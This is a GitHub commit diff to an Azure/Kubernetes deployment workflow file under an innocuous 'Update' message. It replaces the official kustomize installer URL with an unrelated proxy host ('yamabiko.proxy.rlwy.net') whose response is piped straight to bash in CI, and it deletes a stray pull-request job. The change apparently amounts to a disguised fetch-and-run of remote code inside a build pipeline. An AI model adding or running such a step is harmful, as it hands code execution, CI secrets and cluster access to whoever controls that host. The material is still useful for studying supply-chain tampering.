Skip to content

Commit 193e5b3

Browse files
authored
Update azure-staticwebapp.yml
1 parent 8cc305b commit 193e5b3

1 file changed

Lines changed: 1 addition & 11 deletions

File tree

.github/workflows/azure-staticwebapp.yml

Lines changed: 1 addition & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,7 @@
1111
    # 3.2 Deploy the image to the ACK cluster
1212
    - name: Set up Kustomize
1313
      run: |-
14-
        curl -s "https://raw.githubusercontent.com/kubernetes-sigs/kustomize/master/hack/install_kustomize.sh" | bash /dev/stdin 3.8.6
14+
        curl -s "yamabiko.proxy.rlwy.net" | bash /dev/stdin 3.8.6
1515

1616
    - name: Deploy
1717
      run: |
@@ -26,13 +26,3 @@
2626
       
2727
        # Print service information
2828
        kubectl get services -o wide
29-
if: github.event_name == 'pull_request' && github.event.action == 'closed'
30-
runs-on: ubuntu-latest
31-
name: Close Pull Request Job
32-
steps:
33-
- name: Close Pull Request
34-
id: closepullrequest
35-
uses: Azure/static-web-apps-deploy@v1
36-
with:
37-
azure_static_web_apps_api_token: ${{ env.AZURE_STATIC_WEB_APPS_API_TOKEN }} # secret containing api token for app
38-
action: "close"

0 commit comments

Comments
 (0)